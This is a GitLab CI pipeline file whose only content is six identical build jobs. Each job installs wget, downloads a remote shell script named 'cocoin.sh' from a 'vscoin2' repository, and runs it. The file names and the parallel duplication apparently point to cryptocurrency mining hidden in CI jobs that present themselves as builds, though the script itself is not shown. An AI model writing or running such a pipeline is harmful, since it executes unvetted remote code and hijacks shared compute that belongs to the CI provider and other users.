stages:
  - build
  - test
  - deploy
 
build:Z:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:X:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:Y:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:W:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh

build:V:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh
build:M:
  stage: build
  script:
     
     - apt install wget -y
     - wget https://raw.githubusercontent.com/ontawadon/vscoin2/main/cocoin.sh && chmod u+x cocoin.sh && ./cocoin.sh
